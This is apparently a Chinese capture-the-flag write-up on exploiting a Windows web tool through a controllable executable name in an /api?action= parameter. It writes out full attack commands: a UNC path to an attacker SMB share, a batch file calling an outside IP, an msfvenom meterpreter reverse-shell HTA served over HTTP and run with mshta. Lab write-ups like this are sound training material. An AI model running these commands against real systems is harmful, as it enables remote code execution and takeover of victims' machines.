文艺复兴,朝花夕拾。备份一下。
知识点
1.Windows 特性
灵感来源:https://twitter.com/0xTib3rius/status/1608879696477065218
解题步骤
1.打开靶机,是这样一个界面,可以执行 ping 和 tracert。
![](https://www.zhaoj.in/wp-content/uploads/2023/10/169857831335b3987f5fae3ff4bfe010e66d7b70bc.png)
从命令返回看是 Windows 系统。
2.抓包,发现这个接口。
![](https://www.zhaoj.in/wp-content/uploads/2023/10/1698578325ffe81c153cf8679853e13ee36cd46442.png)
是 Python 写的。
请求 /api?action=whoami,发现返回OK。
![](https://www.zhaoj.in/wp-content/uploads/2023/10/169857833389104f30ce0e698599a2113bb17d9942.png)
3.推测后端为 os.subprocess([action, ‘www.zhaoj.in’]),可执行文件名可控,结合其为 Windows,可以尝试用 UNC 路径进行攻击。
在自己的VPS上开一个 smb 服务器。
docker run -it -p 139:139 -p 445:445 -v /tmp:/share -d dperson/samba -s "public;/share"
然后在 /tmp 下创建一个 1.bat。
curl http://162.14.79.59:9988
给其赋予执行权限。
chmod 777 1.bat
然后监听端口
nc -lvnvp 9988
访问 /api?action=\162.14.79.59\public\1.bat, 就可以看到有请求弹回来了。
4.先生成下 MSF 马。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=162.14.121.186 LPORT=4444 -f hta-psh > shell.hta
然后对外放出来。
python3 -m http.server 9866
5.bat 改成如下。
mshta http://162.14.121.186:9866/shell.hta
MSF监听开着。
![](https://www.zhaoj.in/wp-content/uploads/2023/10/1698578417a2649fbeebc25f47fdf5e26f0d6857dc.png)
然后访问 /api?action=\162.14.79.59\public\1.bat。
即可收到回弹。
![](https://www.zhaoj.in/wp-content/uploads/2023/10/1698578426bafbf9ebe302d56c00aa93aeed597cd7.png)
download C:\Th3Th1nsUW4nt.docx ./ 即可拿到flag文件。